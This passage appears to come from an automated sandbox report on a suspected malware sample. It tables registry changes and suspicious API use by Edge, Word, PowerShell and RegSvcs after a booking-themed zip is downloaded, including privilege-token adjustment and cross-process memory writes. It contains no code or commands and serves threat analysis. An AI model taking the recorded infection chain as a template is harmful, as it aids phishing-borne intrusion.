Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\NodeSlot = "3" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Detail_booking_Reservation_ID00909070698876REF91293366999.zip:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4076 wrote to memory of 4688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 4688 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 1744 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4076 wrote to memory of 2804 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
